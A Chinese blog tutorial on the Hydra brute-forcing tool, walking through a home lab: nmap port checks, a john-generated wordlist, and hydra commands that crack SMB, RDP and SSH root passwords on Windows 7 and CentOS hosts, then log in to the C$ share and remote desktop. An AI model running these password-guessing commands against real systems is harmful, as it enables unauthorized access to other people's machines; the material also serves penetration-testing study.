暴力破解-hydra(二)

1.1 hydra介绍

Hydra对应的英文意思是九头蛇,它是一款爆破神器,可以对多种服务的账号和密码进行爆破,包括Web登录、数据库、SSH、FTP 等服务,支持Linux、Windows、 Mac平台安装,其中Kali Linux中自带Hydra。

1.2 hydra使用

1.2.1 hydra参数解释

-l:指定单个用户名称.
-L:指定用户名称字典
-p:指定单个密码
-P:指定密码字典
-S:指定端口
-vV:显示详细的执行过程
-t:通过-t参数来指定线程数默认是16会造成服务器拒绝连接,切记不能太快
-e:表示提供了更多测试选项,nsr 后面的字母对应更多的测试方式:
    n:是尝试空密码登录
    s:是将用户名作为密码登录
    r:是将用户名反过来作为密码登录,如用户名是root,那么会使用toor尝试破解

1.3 实验环境

序号 主机IP 主机系统 主机角色
1 192.168.10.180 Kali 攻击机
2 192.168.10.129 Windows 10 64位 攻击机
3 192.168.10.156 Windows 7 32位 被攻击机
4 192.168.10.80 Centos 7 64位 被攻击机

1.4 实例:使用hydra破解系统用户密码

1.4.1 破解win7文件共享密码

1.4.1.1 开启windows文件共享

在Windows系统当中,默认会启动一些文件共享,比如C$或ADMIN$ (管理共享),而这些共享是使用smb协议,因此我可以针对smb协议进行破解。

图片[1]|暴力破解-hydra(二)|leon的博客

1.4.1.2 扫描445端口是否开启

# nmap 192.168.10.157 -p 445
PORT STATE SERVICE
445/tcp open microsoft-ds

1.4.1.3 生成密码字典

通过john工具生成简单的密码字典,一般的弱口令都会包含进去:

# john --wordlist --rules --stdout > m.txt

1.4.1.4 破解smb文件共享密码

# hydra -l pm -P m.txt smb://192.168.10.157 –vV

图片[2]|暴力破解-hydra(二)|leon的博客

1.4.1.5 通过密码远程访问主机资源

在物理机或其他windows主机中打开运行(Win+R)窗口,输入 \\192.168.10.157\c$:

图片[3]|暴力破解-hydra(二)|leon的博客

图片[4]|暴力破解-hydra(二)|leon的博客

图片[5]|暴力破解-hydra(二)|leon的博客

1.4.2 破解win7远程桌面密码

1.4.2.1 开启远程桌面

图片[6]|暴力破解-hydra(二)|leon的博客

图片[7]|暴力破解-hydra(二)|leon的博客

1.4.2.2 扫描3389端口是否开启

# nmap 192.168.10.157 -p 3389
PORT STATE SERVICE
3389/tcp open ms-wbt-server

1.4.2.3 生成密码字典

参考 《1.4.1.3》章节

1.4.2.4 破解远程桌面密码

# hydra -l pm -P m.txt rdp://192.168.10.157 –vV

图片[8]|暴力破解-hydra(二)|leon的博客

1.4.2.5 通过远程桌面访问主机资源

图片[9]|暴力破解-hydra(二)|leon的博客

图片[10]|暴力破解-hydra(二)|leon的博客

图片[11]|暴力破解-hydra(二)|leon的博客

1.4.3 破解ssh服务root密码

1.4.3.1 扫描ssh端口是否开启

# nmap 192.168.10.80 -p 22
PORT STATE SERVICE
22/tcp open ssh

1.4.3.2 生成密码字典

参考 《1.4.1.3》章节

1.4.3.3 破解ssh远程密码

# hydra -l root -P m.txt -t 4 ssh://192.168.10.80 -e nsr –vV

图片[12]|暴力破解-hydra(二)|leon的博客

温馨提示:本文最后更新于2022-12-20 20:57:34,已超过431天没有更新。某些文章具有时效性,若文章内容或图片资源有错误或已失效,请联系站长。谢谢!
转载请注明本文链接:https://blog.leonshadow.cn/763482/2791.html
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享